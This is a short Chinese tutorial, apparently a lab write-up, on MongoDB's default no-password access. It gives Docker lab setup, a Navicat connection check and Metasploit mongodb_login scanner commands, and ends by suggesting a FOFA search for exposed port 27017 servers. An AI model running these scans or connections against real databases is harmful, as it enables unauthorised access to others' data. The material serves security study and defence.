MongoDB未授权访问漏洞
mongodb数据库是由C++编写,主要是为了提供web应可用扩展的一种高性能数据库。开启MongoDB服务时不添加任何参数时,默认是没有权限验证的,登录的用户可以通过默认端口无需密码对数据库任意操作(增、删、改、查高危动作)而且可以远程访问数据库。
一、漏洞原因
原因是mongodb数据库安装完成之后默认空口令致使攻击者无需账号就可以登录。
二、漏洞复现
2.1靶场搭建
靶机:centos(搭建了docker的虚拟机) IP:192.168.30.138
攻击机:kali IP:192.168.30.129
拉取镜像:docker pull mongo
启动镜像docker run -d -p 27017:27017 mongo
查看镜像:docker ps -a
2.2 靶场漏洞利用
方法一:用navicat链接MongoDB,若如图在无验证情况下连接成功这证明有未授权访问漏洞
方法二:
msfconsole
use auxiliary/scanner/mongodb/mongodb_loginshow options
set rhosts 192.168.30.138
set threads 15
exploit
2.3实例
在fofo里搜索 port="27017"